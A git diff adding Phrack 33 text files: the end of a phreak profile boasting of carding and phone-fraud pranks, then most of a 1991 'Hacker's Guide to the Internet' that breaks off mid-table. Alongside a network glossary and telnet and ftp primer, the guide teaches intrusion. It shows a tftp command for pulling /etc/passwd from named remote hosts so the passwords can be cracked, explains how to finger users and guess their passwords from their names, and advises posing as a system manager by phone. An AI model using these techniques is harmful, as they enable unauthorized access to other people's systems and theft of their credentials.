+               or something.  I don't know why he needed me for his own
+               personal validation.  I was one of the first people to see
+               through him and I realized early on that he was a pathological
+               liar.  Later on he lied about me on a BBS and got me kicked off,
+               because the Sysop though he was this great guy.  Sheesh.
+
+Sir Francis Drake -- Certainly one of the more unique people I've met.  He
+                     printed a really crappy two-part fiction story I wrote in
+                     his WORM magazine.  Shortly after that the magazine
+                     folded; I think there's a connection.
+
+David Lightman -- Never met him, but he used to share my Unix account at
+                  school.
+
+The Disk Jockey -- He pulled a TRW report on the woman that I later ended
+                   up marrying.  Incidentally, he can be seen playing
+                   basketball in the background in one scene of the film
+                   "Hoosiers."
+
+Lex Luthor -- I have to respect somebody who would first publish my article in
+              LOD TJ and then call me up for no reason a year later and give me
+              his private Tymnet outdial code.
+
+Dr. Strangelove -- He runs a really cool BBS called JUST SAY YES.  Call it at
+                   (415) 922-2008.  DSL is probably singularly responsible for
+                   getting me into IBM clones, which in turn got me my job (how
+                   many Apple // programmers are they hiring nowadays?).
+
+BBSs
+~~~
+Sherwood Forest II and III, OSUNY -- I just thought they were the greatest
+                                     systems ever.
+
+Pirate's Bay -- Run by Mr. KRACK-MAN, who considered himself the greatest Apple
+                pirate that ever lived.  It's still up, for all I know.
+
+The 2600 Magazine BBS -- Run on a piece of Apple BBS software called
+                         TBBS.  It is there that I met David Flory.
+
+The Police Station -- Remember THAT one?
+
+The Matrix, IDI, Lunatic Labs -- Three great Bay Area Forum-PC boards.
+
+Catch-22 -- 25 Users, No Waiting!
+
+And, of course, net.telecom (the original), comp.risks, rec.arts.startrek...
+
+Memories
+~~~~~~~~
+     Remember Alliance Teleconferencing?  Nothing like putting the receiver
+down to go get something to eat, forgetting about it, coming back in 24 hours,
+and finding the conference still going on.
+
+     Playing Wizardry and Rescue Raiders on my Apple //e until I lost the
+feeling in my fingers...
+
+     Carding 13 child-sized Garfield sleeping bags to people I didn't
+particularly care for in high school...
+
+     Calling Canadian DA Ops and playing a 2600Hz tone for them was always fun.
+
+     Trashing all the local COs with The Mad Alchemist...
+
+     My brush with greatness:  I was riding BART home from school one night a
+few years ago when Steve Wozniak got onto my car with two of his kids.  He was
+taking them to a Warriors game.  I was the only person in the car that
+recognized him.  He signed a copy of BYTE that I happened to have on me and we
+talked about his new venture, CL-9, the universal remote controller.  (Do you
+know anybody who ever BOUGHT one of those?)
+
+....And now, for the question
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+     "Of the general population of phreaks you have met, would you consider
+most phreaks, if any, to be computer geeks?"
+
+     Back in my Apple pirating days, I met quite a few young men who were
+definitely members of the Order of the Geek.  However, I can count the number
+of true phreaks/hackers I have met personally on one hand.  None of them are
+people I'd consider geeks, nerds, spazzes, dorks, etc.  They're all people who
+live on the fringe and do things a bit differently -- how many LEGAL people do
+you know that have a nose ring? -- but they're all people I've respected.
+Well, let me take back what I just said.  Dr. Strangelove looks kinda geeky in
+my opinion (my mother thinks he's cute, but then again she said that Sir
+Francis Drake is "cute" and when I told him that it bothered him to no end),
+but I consider him a good friend and a generally k-kool d00d.  (I'm sure I'll
+be getting a voice call from him on that one...)  The only phreak that I've
+ever taken a genuine disliking to was Oryan QUEST, but that was only because he
+was a pathological liar and a pest.  Who knows, he might be a nice person now,
+so no offense intended, especially if he knows my home address.
+
+     So, Anyway...
+
+-> Thanks for your time Shooting Shark.
+
+                                             Crimson Death
+_______________________________________________________________________________
diff --git a/phrack33/3.txt b/phrack33/3.txt
new file mode 100644
index 0000000..de63557
--- /dev/null
+++ b/phrack33/3.txt
@@ -0,0 +1,921 @@
+                                ==Phrack Inc.==
+
+                Volume Three, Issue Thirty-Three, File 3 of 13
+
+______________________________________________________________________________
+
+                       A Hacker's Guide to the Internet
+
+                                 By The Gatsby
+
+                      Version 2.00 / AXiS / July 7, 1991
+______________________________________________________________________________
+
+
+1   Index
+~~~~~~~~~
+            Part:     Title:
+            ~~~~      ~~~~~
+             1        Index
+             2        Introduction
+             3        Glossary, Acronyms, and Abbreviations
+             4        What is the Internet?
+             5        Where You Can Access The Internet
+             6        TAC
+             7        Basic Commands
+               a           TELNET command
+               b           ftp ANONYMOUS to a Remote Site
+               c           Basic How to tftp the Files
+               d           Basic Fingering
+             8        Networks
+             9        Internet Protocols
+            10        Host Names and Addresses
+
+
+2   Introduction
+~~~~~~~~~~~~~~~~
+     The original release of this informative file was in an IRG newsletter,
+but it had some errors that I wanted to correct.  I have also added more
+technical information.
+
+     This file is intended for the newcomer to Internet and people (like
+me) who are not enrolled at a university with Internet access.  It covers the
+basic commands, the use of Internet, and some tips for hacking through
+Internet. There is no MAGICAL way to hacking a UNIX system.  If you have any
+questions, I can be reached on a number of boards.
+
+- The Crypt       -            - 619/457+1836 -     - Call today -
+- Land of Karrus  -            - 215/948+2132 -
+- Insanity Lane   -            - 619/591+4974 -
+- Apocalypse NOW  -            - 2o6/838+6435 -  <*> AXiS World HQ <*>
+
+  Mail me on the Internet:  gats@ryptyde.cts.com
+                            bbs.gatsby@spies.com
+
+                                The Gatsby
+
+*** Special Thanks go to Haywire (a/k/a Insanity: SysOp of Insanity Lane),
+    Doctor Dissector, and all the members of AXiS.
+
+
+3   Glossary, Acronyms, and Abbreviations
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ACSE     -  Association Control Service Element, this is used with ISO to help
+            manage associations.
+ARP      -  Address Resolution Protocol, this is used to translate IP protocol
+            to Ethernet Address.
+ARPA     -  Defense Advanced Research Project Agency
+ARPANET  -  Defense Advanced Research Project Agency or ARPA.  This is an
+            experimental PSN which is still a sub network in the Internet.
+CCITT    -  International Telegraph and Telephone Consultative Committee is a
+            international committee that sets standard.  I wish they would set
+            a standard for the way they present their name!
+CERT     -  Computer Emergency Response Team, they are responsible for
+            coordinating many security incident response efforts.  They have
+            real nice reports on "holes" in various UNIX strands, which you
+            should get because they are very informative.
+CMIP     -  Common Management Information Protocol, this is a new HIGH level
+            protocol.
+CLNP     -  Connection Less Network Protocol is OSI equivalent to Internet IP
+DARPA    -  Defence Advanced Research Project Agency.  See ARPANET
+DDN      -  Defence Data Network
+driver   -  a program (or software) that communicates with the network itself,
+            examples are TELNET, FTP, RLOGON, etc.
+ftp      -  File Transfer Protocol, this is used to copy files from one host
+            to another.
+FQDN     -  Fully Qualified Domain Name, the complete hostname that reflects
+            the domains of which the host is a part.
+Gateway  -  Computer that interconnects networks.
+Host     -  Computer that is connected to a PSN.
+Hostname -  Name that officially identifies each computer attached
+            internetwork.
+Internet -  The specific IP-base internetwork.
+IP       -  Internet Protocol which is the standard that allows dissimilar
+            host to connect.
+ICMP     -  Internet Control Message Protocol is used for error messages for
+            the TCP/IP.
+LAN      -  Local Area Network
+MAN      -  Metropolitan Area Network
+MILNET   -  DDN unclassified operational military network.
+NCP      -  Network Control Protocol, the official network protocol from 1970
+            until 1982.
+NIC      -  DDN Network Information Center
+NUA      -  Network User Address
+OSI      -  Open System Interconnection.  An international standardization
+            program facilitate to communications among computers of different
+            makes and models.
+Protocol -  The rules for communication between hosts, controlling the
+            information by making it orderly.
+PSN      -  Packet Switched Network
+RFC      -  Request For Comments, is technical files about Internet protocols
+            one can access these from anonymous ftp at NIC.DDN.MIL.
+ROSE     -  Remote Operations Service Element, this is a protocol that is used
+            along with OSI applications.
+TAC      -  Terminal Access Controller; a computer that allow direct access to
+            Internet.
+TCP      -  Transmission Control Protocol
+TELNET   -  Protocol for opening a transparent connection to a distant host.
+tftp     -  Trivial File Transfer Protocol, one way to transfer data from one
+            host to another.
+UDP      -  User Datagram _Protocol
+Unix     -  This is copyrighted by AT&T, but I use it to cover all the
+            look-alike Unix systems, which you will run into more often.
+UUCP     -  Unix-to-Unix Copy Program, this protocol allows UNIX file
+            transfers.  This uses phone lines using its own protocol, X.25 and
+            TCP/IP.  This protocol also exist for VMS and MS-DOS.
+uucp     -  uucp when in lower case refers to the UNIX command uucp.  For
+            more information on uucp read files by The Mentor in the Legion of
+            Doom Technical Journals.
+WAN      -  Wide Area Network
+X.25     -  CCITTs standard protocol that rules the interconnection of two
+            hosts.
+
+
+     In this file I have used several special charters to signify certain
+things. Here is the key;
+
+*  - Buffed from UNIX itself.  You will find this on the left side of the
+     margin.  This is normally "how to do" or just "examples" of what to do
+     when using Internet.
+
+#  - This means these are commands, or something that must be typed in.
+
+
+4   What is the Internet?
+~~~~~~~~~~~~~~~~~~~~~~~~~
+     To understand the Internet you must first know what it is.  The Internet
+is a group of various networks, ARPANET (an experimental WAN) was the first.
+ARPANET started in 1969, this experimental PSN used Network Control Protocol
+(NCP).  NCP was the official protocol from 1970 until 1982 of the Internet (at
+this time also known as DARPA Internet or ARPA Internet).  In the early 80's
+DARPA developed the Transmission Control Protocol/Internet Protocol which is
+the official protocol today, but much more on this later.  Due to this fact,
+in 1983 ARPANet split into two networks, MILNET and ARPANET (both are still
+part of the DDN).
+
+    The expansion of Local Area Networks (LAN) and Wide Area Networks (WAN)
+helped make the Internet connecting 2,000+ networks strong.  The networks
+include NSFNET, MILNET, NSN, ESnet and CSNET.  Though the largest part of the
+Internet is in the United States, the Internet still connects the TCP/IP
+networks in Europe, Japan, Australia, Canada, and Mexico.
+
+
+5   Where You Can Access Internet
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+     Internet is most likely to be found on Local Area Networks or LANs and
+Wide Area networks or WANs.  LANs are defined as networks permitting the
+interconnection and intercommunication of a group of computers, primarily for
+the sharing of resources such as data storage device and printers.  LANs cover
+a short distance (less than a mile) and are almost always within a single
+building complex.  WANs are networks which have been designed to carry data
+calls over long distances (many hundreds of miles).  You can also access
+Internet through TymNet or Telenet via gateway.  You'll have to find your own
+NUAs though.
+
+
+6   TAC
+~~~~~~~
+     TAC (terminal access controller) is another way to access Internet.  This
+is just dial-up terminal to a terminal access controller.  You will need to
+get a password and an account.  TAC has direct access to MILNET.  One example
+of a TAC dialup is (800)368-2217, but there are several out there to be found.
+In fact, CERT has a report circulating about people attempting to find these
+dialups through social engineering.
+
+     If you want the TAC manual you can write a letter to:
+
+       Defense Communications Agency
+       Attn: Code BIAR
+       Washington, DC 2o3o5-2ooo
+
+Be sure to write that you want the TAC User Guide, 310-p70-74.
+
+     In order to logon, you will need a TAC Access Card.  You would probably
+get it from the DDN NIC.  Here is a sample logon:
+
+
+Use Control-Q for help...
+
+*
+* PVC-TAC 111: 01               \ TAC uses to this to identify itself
+* @ #o 124.32.5.82               \ Use ``O'' for open and the internet
+*                                / address which yea want to call.
+*
+* TAC Userid: #THE.GATSBY
+* Access Code: #10kgb0124
+* Login OK
+* TCP trying...Open
+*
+*
+
+
+7   Basic Commands
+~~~~~~~~~~~~~~~~~~
+a:  Basic TELNET Commands
+
+      Situation:  You have an account on a UNIX system that is a host on
+Internet.  Now you can access the entire world!  Once the UNIX system you
+should see a prompt, which can look like a '$' or '%' (it also depends on what
+shell you are in and the type of Unix system).  At the prompt you can do all
+the normal UNIX commands, but when on a Internet host you can type 'telnet'
+which will bring you to the 'telnet' prompt.
+
+*
+* $ #telnet
+* ^   ^
+  |   |
+  |  the command that will bring you to the telnet prompt
+  |
+  a normal UNIX prompt
+
+
+     You should get this:
+
+*
+* telnet>
+*
+     At this prompt you will have a whole different set of commands which are
+as follows (This comes from UCSD, so it may vary from place to place).
+
+*
+* telnet> #help
+*
+* close           close current connection
+* display         display operating parameters
+* open            connect to a site
+* quit            exit telnet
+* send            transmit special character
+* set             set operating parameters
+* status          print status information
+* toggle          toggle operating parameters
+* ?               to see what you are looking at now
+*
+
+close      - this command is used to 'close' a connection, when multitasking
+             or jumping between systems.
+
+display    - this set the display setting, commands for this are as follow.
+
+             ^E    echo.
+             ^]    escape.
+             ^H    erase.
+             ^O    flushoutput.
+             ^C    interrupt.
+             ^U    kill.
+             ^\    quit.
+             ^D    eof.
+
+
+open       - type 'open [host]' to connect to a system
+
+*
+* $ #telnet ucsd.edu
+*
+
+     or
+*
+* telnet> #open 125.24.64.32.1
+*
+
+quit   - to get out of telnet and back to UNIX
+send   - send files
+set    - set
+echo   - character to toggle local echoing on/off
+escape - character to escape back to telnet command mode
+
+
+     The following need 'localchars' to be toggled:
+
+erase         -  character to cause an Erase Character
+flushoutput   -  character to cause an Abort Output
+interrupt     -  character to cause an Interrupt Process
+kill          -  character to cause an Erase Line
+quit          -  character to cause a Break
+eof           -  character to cause an EOF
+?             -  display help information
+
+
+b:   ftp ANONYMOUS to a remote site
+
+     ftp or file transfer protocol is used to copy files from a remote host to
+the one that you are on.  You can copy anything.  Security has really clamped
+down on the passwd file, but it will still work here and there (always worth a
+shot).
+
+     This could be useful when you see a Internet CuD (Computer Underground
+Digest) site that accepts a anonymous ftps, and you want to read the CuDs, but
+do not feel like wasting your time on boards downloading them.  The best way
+to start out is to ftp a directory to see what you are getting.
+
+     Example:  The CuD archive site has an Internet address of 192.55.239.132
+and my account name is "gats".
+
+*
+* $ #ftp
+* ^  ^
+  |  |
+  | ftp command
+  |
+ UNIX prompt
+
+*
+* ftp> #open 192.55.239.132
+* Connected to 192.55.239.132
+* 220 192.55.239.132 FTP Server (sometimes the date, etc)
+* Name (192.55.239.132:gats): #anonymous
+*            ^         ^        ^
+             |         |        |
+             |         |       This is where you type 'anonymous' unless
+             |         |     you have a account on 192.55.239.132.
+             |         |
+             |        This is the name of my account or [from]
+             |
+            This is the Internet address or [to]
+*
+* Password: #gats
+*            ^
+             |
+            For this just type your username or anything you feel like typing
+            in at that time.  It doesn't matter.
+
+*
+* % ftp 192.55.239.132
+* Connected to 192.55.239.132
+* ftp> #ls
+*       ^
+        |
+       You are connected now, thus you can ls it.
+
+     Just move around like you would in a normal unix system.  Most of the
+commands still apply on this connection. Here is a example of me getting a
+copy of the Electronic Frontier Foundation's Effector (issue 1.04) from
+Internet address 192.55.239.132.
+
+*
+* % #ftp
+* ftp> #open 128.135.12.60
+* Trying 128.135.12.60...
+* 220 chsun1 FTP server (SunOS 4.1) ready.
+* Name (128.135.12.60:gatsby): anonymous
+* 331 Guest login ok, send ident as password.
+* Password: #gatsby
+* 230 Guest login ok, access restrictions apply.
+* ftp> #ls
+* 200 PORT command successful.
+* 150 ASCII data connection for /bin/ls (132.239.13.10,4781) * (0 bytes).
+* .hushlogin
+* bin
+* dev
+* etc
+* pub
+* usr
+* README
+* 226 ASCII Transfer complete.
+* 37 bytes received in 0.038 seconds (0.96 Kbytes/s)
+* ftp>
+
+     _________________________________________________________________________
+    |
+    |  This is where you can try to 'cd' the "etc" dir or just 'get'
+    |  /etc/passwd, but grabbing the passwd file this way is a dieing art.
+    |_________________________________________________________________________
+
+* ftp> #cd pub
+* 200 PORT command successful.
+* ftp> #ls
+* ceremony
+* cud
+* dos
+* eff
+* incoming
+* united
+* unix
+* vax
+* 226 ASCII Transfer cmplete.
+* 62 bytes received in 1.1 seconds (0.054 Kbytes/s)
+* ftp> #cd eff
+* 250 CWD command successful.
+* ftp> #ls
+* 200 PORT command successful.
+* 150 ASCII data connection for /bin/ls (132.239.13.10,4805) (0 bytes).
+* Index
+* eff.brief
+* eff.info
+* eff.paper
+* eff1.00
+* eff1.01
+* eff1.02
+* eff1.03
+* eff1.04
+* eff1.05
+* realtime.1
+* 226 ASCII Transfer complete.
+* 105 bytes received in 1.8 seconds (0.057 Kbytes/s)
+* ftp> #get
+* (remote-file) #eff1.04
+* (local-file) #eff1.04
+* 200 PORT command successful.
+* 150 Opening ASCII mode data connection for eff1.04 (909 bytes).
+* 226 Transfer complete.
+* local: eff1.04 remote: eff1.04
+* 931 bytes received in 2.2 seconds (0.42 Kbytes/s)
+* ftp> #close
+* Bye...
+* ftp> #quit
+* %
+*
+
+     To read the file you can just 'get' the file and buffer it.  If the files
+are just too long, you can 'xmodem' it off the host you are on.  Just type
+'xmodem' and that will make it much faster to get the files.  Here is the set
+up (as found on ocf.berkeley.edu).
+
+   If you want to:                                         type:
+
+send a text file from an apple computer to the ME       xmodem ra <filename>
+send a text file from a non-apple home computer         xmodem rt <filename>
+send a non-text file from a home computer               xmodem rb <filename>
+send a text file to an apple computer from the ME       xmodem sa <filename>
+send a text file to a non-apple home computer           xmodem st <filename>
+send a non-text file to a home computer                 xmodem sb <filename>
+
+xmodem will then display:
+
+*
+* XMODEM Version 3.6 -- UNIX-Microcomputer Remote File Transfer Facility
+* File filename Ready to (SEND/BATCH RECEIVE) in (binary/text/apple) mode
+* Estimated File Size (file size)
+* Estimated transmission time (time)
+* Send several Control-X characters to cancel
+*
+
+
+Hints- File transfer can be an iffy endeavor; one thing that can help is to
+       tell the annex box not to use flow control.  Before you do rlogin, type
+
+ stty oflow none
+ stty iflow none
+
+at the annex prompt.  This works best coming through 2-6092.
+
+    Some special commands used during ftp session are cdup (same as cd ..) and
+dir (gives a detailed listing of the files).
+
+
+c:   How to tftp the Files
+
+     tftp (Trivial File Transfer Protocol, the command is NOT in caps, because
+UNIX is case sensitive) is a command used to transfer files from host to host.
+This command is used sometimes like ftp, in that you can move around using
+UNIX commands.  I will not go into this part of the command, but I will go
+into the basic format, and structure to get files you want. Moreover, I will
+be covering how to flip the /etc/passwd out of remote sites.
+     There is a little trick that has been around a while.  It helps you to
+"flip" the /etc/passwd file out of different sites, which gets you the passwd
+file without out breaking into the system.  Then just run Brute Hacker (the
+latest version) on the thing and you save time and energy.  This 'hole' (not
+referring to the method of obtaining Unix superuser status) may can be found
+on SunOS 3.X, but has been fixed in 4.0.  It has sometimes appeared in
+System V, BSD and a few others.
+
+     The only problem with this 'hole' is that the system manager will often
+realize what you are doing.  The problem occurs when attempts to tftp the
+/etc/passwd is happen too many times.  You may see this (or something like
+this) when you logon on to your account.  This was buffered off of
+plague.berkeley.edu.  I guess they knew what I was doing.
+
+*
+* DomainOS Release 10.3 (bsd4.3) Apollo DN3500 (host name):
+*         This account has been deactivated due to use in system cracking
+* activities (specifically attempting to tftp /etc/passwd files from remote
+* sites) and for having been used or broken in to from <where the calls are
+* from>.  If the legitimate owner of the account wishes it reactivated,
+* please mail to the staff for more information.
+*
+* - Staff
+*
+
+     The tftp is used in this format:
+
+ tftp -<command> <any name> <Internet Address>  /etc/passwd  <netascii>
+
+Command      -g   is to get the file, this will copy the file onto
+                  your 'home' directory, thus you can do anything with
+                  the file.
+
+Any Name     If your going to copy it to your 'home' directory, it needs a
+             name.
+
+Internet     This is the address that you want to snag the passwd file from.
+ Address     There are hundreds of thousands of them.
+
+/ETC/PASSWD  THIS IS THE FILE THAT YOU WANT.  You do not want John Smith's
+             even though it would be trivial to retreive it.
+
+netascii     This how you want the file to be transferred.
+
+&            Welcome to the power of UNIX, it is multitasking, this little
+             symbol place at the end will allow you to do other things (such
+             as grab the passwd file from the UNIX that you are on).
+
+     Here is the set up:  We want to get the passwd file from
+sunshine.ucsd.edu.  The file in your 'home' directory is going to be named
+'asunshine'.
+
+*
+* $ #tftp -g asunshine sunshine.ucsd.edu /etc/passwd &
+*
+
+
+d  Basic Fingering
+
+     Fingering is a real good way to get an account on remote sites.  Typing
+'who' or just 'finger <account name> <CR>' you can have names to "finger".
+This will give you all kinds information on the person's account.  Here is a
+example of how to do it:
+
+*
+* % #who
+* joeo                 ttyp0       Jun 10 21:50   (bmdlib.csm.edu)
+* gatsby               ttyp1       Jun 10 22:25   (foobar.plague.mil)
+* ddc                  crp00       Jun 10 11:57   (aogpat.cs.pitt.edu)
+* liliya               display     Jun 10 19:40
+
+                 /and fingering what you see
+
+* % #finger bbc
+* Login name: ddc                     In real life: David Douglas Cornwall
+* Office: David C. Co
+* Directory: //aogpat/users_local/bdc     Shell: /bin/csh
+* On since Jun 10 11:57:46 on crp00 from aogpat   Phone 555-1212
+* 52 minutes Idle Time
+* Plan:  I like to eat apples and bananas.
+* %
+*
+
+     Now you could just call (or Telnet to) 'aogpat.cs.pit.edu' and try to
+hack out an account.  Try the last name as the password, the first name, the
+middle name, and try them all backwards.  The chances are real good that you
+WILL get in because people are stupid.
+
+     If there are no users online for you to type "who" you can just type
+"last" and all of the users who logged on will come rolling out.  Now "finger"
+them.  The only problem with using the "last" command is aborting it.
+
+     You can also try telephoning individual users and tell them you are the
+system manager (i.e. social engineer them).  However, I have not always seen
+phone numbers in everyone's ".plan" file (the file you see when you finger the
+user).
+
+
+8  Other Networks
+~~~~~~~~~~~~~~~~~
+AARNet -      Australian Academic and Research Network.  This network supports
+              research for various Australian Universities.  This network
+              supports TCP/IP, DECnet, and OSI (CLNS).
+
+ARPANET -     We've already discussed this network.
+
+BITNET -      Because It's Time NETwork (BITNET) is a worldwide network that
+              connects many colleges and universities.  This network uses many
+              different protocols, but it dose use the TCP/IP.
+
+CREN CSNET -  Corporation for Research and Educational Network (CREN) or
+              Computer + Science research NETwork (CSNET).  This network links
+              scientists at sites all over the world.  CSNET providing access
+
+              to the Internet, CREN to BITNET.  CREN is the name more often
+              used today.
+
+CSUNET -      California State University Network (CSUNET).  This network
+              connects the California State University campuses and other
+              universities in California.  This network is based on the CCITT
+              X.25 protocol, and also uses TCP/IP, SNA/DSLC, DECnet, and
+              others.
+
+
+
+The Cypress Net - This network started as a experimental network.  The use of
+                  this network today is as a connection to the TCP/IP Internet
+                  as a cheap price.
+
+DRI -        Defense Research Internet is a WAN that is used as a platform
+             from which to work from.  This network has all kind of services,
+             such as multicast service, real-time conference and more.  This
+             network uses the TCP/IP (also see RFC 907-A for more information
+             on this network).
+
+ESnet -      This is the new network operated by the Department of Energy's
+             Office of Energy Research (DoE OER).  This net is the backbone
+             for all DoE OER programs.  This network replaced the High Energy
+             Physics DECnet (HEPnet) and also the Magnetic Fusion Energy
+             network (MFEnet).  The protocols offered are IP/TCP and also
+             DECnet service.
+
+JANET -      JANET is a Joint Academic NETwork based in the UK, connected to
+             the Internet.  JANET is a PSN (information has pass through a
+             PAD) using the protocol X.25 though it does support the TCP/IP.
+             This network also connects PSS (Packet Switched Service is a PSN
+             that is owned and operated by British telecom).
+
+JUNET -      Japan's university message system using UUCP, the Internet as its
+             backbone, and X.25 (see RFC 877).  This network is also a part of
+             USENET (this is the network news).
+
+Los Nettos - Los Nettos is a high speed MAN in the Los Angeles area.  This
+             network uses the IP/TCP.
+
+MILNET -     When ARPANET split, the DDN was created and MILNET (MILitary
+             NETwork) is also a part of the network.  MILNET is unclassified,
+             but there are three other classified networks that make up the
+             DDN.
+
+NORDUNet -   This net is the backbone to the networks in the Nordic Countries,
+             Denmark (DENet), Finland (FUNET), Iceland (SURIS), Norway
+             (UNINETT), and Sweden (SUNET).  NORDUnet supports TCP/IP, DECNet,
+             and X.25.
+
+NSN -        NASA Science Network (NSN).  This network is used by NASA to send
+             and relay information.  The protocols used are TCP/IP.  NSN has a
+             sister network called Space Physics Analysis Network (SPAN) for
+             DECNet.
+
+ONet -       Ontario Network is a TCP/IP network used for research.
+
+NSFNet -     National Science Foundation Network, this network is in the
+             IP/TCP family, but in any case it uses UDP (User Diagram
+             Protocol) and not TCP.  NSFnet is the network for the US
+             scientific and engineering research community.  Listed below are
+             all the NSFNet Sub-networks:
+
+       BARRNet -     Bay Area Regional Research Network is located in the San
+                     Francisco area.  This network uses TCP/IP.
+
+       CERFnet -     California Education and Research Federation Network is
+                     a research based network supporting Southern California
+                     Universities communication services.  This network uses
+                     TCP/IP.
+
+       CICNet -      Committee on Institutional Cooperation.  This network
+                     services the BIG 10, and University of Chicago.  This
+                     network uses TCP/IP.
+
+       JvNCnet -     John von Neumann National Supercomputer Center.  This
+                     network uses TCP/IP.
+
+       Merit -       Merit connects Michigan's academic and research
+                     computers. This network supports TCP/IP, X.25 and
+                     Ethernet for LANs.
+
+       MIDnet -      MIDnet connects 18 universities and research centers in
+                     the midwest United States.  The support protocols are
+                     TELNET, FTP and SMTP.
+
+       MRNet -       Minnesota Regional Network, this network services
+                     Minnesota.  The network protocols are TCP/IP.
+
+       NEARnet -     New England Academic and Research Network, connects
+                     various research/educational institutions.  You
+                     can get more information about this net by mailing
+                     'nearnet-staff@bbn.com'.
+
+
+       NCSAnet -     The National Center for Supercomputing Applications
+                     supports the whole IP family (TCP, UDP, ICMP, etc).
+
+       NWNet -       North West Network provides service to the Northwestern
+                     United States and Alaska.  This network supports IP and
+                     DECnet.
+
+       NYSERNet -    New York Service Network is a autonomous nonprofit
+                     network.  This network supports the TCP/IP.
+
+       OARnet -      Ohio Academic Resources Network gives access to the
+                     Ohio Supercomputer Center.  This network supports TCP/IP.
+
+       PREPnet -     Pennsylvania Research and Economic Partnership is a
+                     network operated and managed by Bell of Pennsylvania.  It
+                     supports TCP/IP.
+
+       PSCNET -      Pittsburgh Supercomputer Center serving Pennsylvania,
+                     Maryland, and Ohio.  It supports TCP/IP, and DECnet.
+
+       SDSCnet -     San Diego Super Computer Center is a network whose goal
+                     is to support research in the field of science.  The
+                     Internet address is 'y1.ucsc.edu' or call Bob at
+                     (619)534-5060 and ask for a account on his Cray.
+
+       Sesquinet -   Sesquinet is a network based in Texas.  It supports
+                     TCP/IP.
+
+       SURAnet -     Southeastern Universities Research Association Network
+                     is a network that connects institutions in the Southeast
+                     United States.
+
+       THEnet -      Texas Higher Education Network is a network that is run
+                     by Texas A&M University.  This network connects to hosts
+                     in Mexico.
+
+       USAN/NCAR -   University SAtellite Network (USAN)/National Center for
+                     Atmospheric Research is a network for information
+                     exchange.
+
+       Westnet -     Westnet connects the western part of the United States,
+                     but not including California.  The network is supported
+                     by Colorado State University.
+
+USENET -     USENET is the network news (the message base for the Internet).
+             This message base is quite large with over 400 different topics
+             and connecting to 17 different countries.
+
+
+9  Internet Protocols
+~~~~~~~~~~~~~~~~~~~~~
+     TCP/IP is a general term relating to the whole family of Internet
+protocols.  The protocols in this family are IP, TCP, UDP, ICMP, ROSE, ACSE,
+CMIP, ISO, ARP and Ethernet for LANs.  If if you want more information, get
+the RFCs.
+
+      TCP/IP protocol is a "layered" set of protocols.  In this diagram taken
+from RFC 1180 you will see how the protocol is layered when connection is
+made.
+
+Figure is of a Basic TCP/IP Network Node:
+
+         -----------------------------------
+         |      Network    Application     |
+         |                                 |
+         | ... \  |  /  ..  \  |  /    ... |
+         |     -------      -------        |
+         |     | TCP |      | UDP |        |
+         |     -------      -------        |
+         |           \       /             |          % Key %
+         |  -------   ---------            |          ~~~~~~~
+         |  | ARP |   |  IP   |            |   UDP  User Diagram Protocol
+         |  -------   ------*--            |   TCP  Transfer Control Protocol
+         |     \            |              |   IP   Internet Protocol
+         |      \           |              |   ENET Ethernet
+         |       -------------             |   ARP  Address Resolution
+         |       |    ENET   |             |                  Protocol
+         |       -------@-----             |   O    Transceiver
+         |              |                  |   @    Ethernet Address
+         -------------- | ------------------   *    IP address
+                        |
+========================O=================================================
+      ^
+      |
+  Ethernet Cable
+
+TCP/IP:  If connection is made is between the IP module and the TCP module the
+         packets are called a TCP datagram.  TCP is responsible for making
+         sure that the commands get through the other end.  It keeps track of
+         what is sent, and retransmits anything that does not go through.  The
+         IP provides the basic service of getting TCP datagram from place to
+         place.  It may seem like the TCP is doing all the work, this is true
+         in small networks, but when connection is made to a remote host on
+         the Internet (passing through several networks) this is a complex
+         job. Say I am connected from a server at UCSD to LSU (SURAnet) the
+         data grams have to pass through a NSFnet backbone.  The IP has to
+         keep track of all the data when the switch is made at the NSFnet
+         backbone from the TCP to the UDP.  The only NSFnet backbone that
+         connects LSU is the University of Maryland, which has different
+         circuit sets.  The cable (trunk)/circuit types are the T1 (a basic
+         24-channel 1.544 Md/s pulse code modulation used in the US) to a
+         56 Kbps.  Keeping track of all the data from the switch from T1 to
+         56Kbs and TCP to UDP is not all it has to deal with.  Datagrams on
+         their way to the NSFnet backbone (at the University of Maryland) may
+         take many different paths from the UCSD server.
+
+         All the TCP does is break up the data into datagrams (manageable
+         chunks), and keeps track of the datagrams.  The TCP keeps track of
+         the datagrams by placing a header at the front of each datagram.  The
+         header contains 160 (20 octets) pieces of information about the
+         datagram.  Some of this information is the FQDN (Fully Qualified
+         Domain Name).  The datagrams are numbers in octets (a group of eight
+         binary digits, say there are 500 octets of data, the numbering of the
+         datagrams would be 0, next datagram 500, next datagram 1000, 1500
+          etc.
+
+UDP/IP:  UDP is one of the two main protocols of the IP.  In other words the
+         UDP works the same as TCP, it places a header on the data you send,
+         and passes it over to the IP for transportation throughout the
+         Internet.  The difference is that it offers service to the user's
+         network application.  It does not maintain an end-to-end connection,
+         it just pushes the datagrams out.
+
+ICMP:  ICMP is used for relaying error messages.  For example you might try to
+       connect to a system and get a message back saying "Host unreachable",
+       this is ICMP in action.  This protocol is universal within the
+       Internet, because of its nature.  This protocol does not use port
+       numbers in it's headers, since it talks to the network software itself.
+
+
+Ethernet:  Most of the networks use Ethernet.  Ethernet is just a party line.
+           When packets are sent out on the Ethernet, every host on the
+           Ethernet sees them.  To make sure the packets get to the right
+           place, the Ethernet designers wanted to make sure that each address
+           is different.  For this reason 48 bits are allocated for the
+           Ethernet address, and a built in Ethernet address on the Ethernet
+           controller.
+
+           The Ethernet packets have a 14-octet header, this includes address
+           "to" and "from."  The Ethernet is not too secure, it is possible to
+           have the packets go to two places, thus someone can see just what
+           you are doing.  You need to take note that the Ethernet is not
+           connected to the Internet.  A host on both the Ethernet and on the
+           Internet has to have both an Ethernet connection and an Internet
+           server.
+
+ARP:  ARP translates the IP address into an Ethernet address.  A conversion
+      table is used (the table is called ARP Table) to convert the addresses.
+      Therefore, you would never even know if you were connected to the
+      Ethernet because you would be connecting to the IP address.
+
+      The following is a real sketchy description of a few Internet protocols,
+      but if you would like to get more information you can access it via
+      anonymous ftp from several hosts.  Here is a list of RFCs that deal with
+      the topic of protocols.
+
+      |~~~~~~~~~~~~~~~|~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~|
+      |     RFC:      |       Description:                     |
+      |               |                                        |
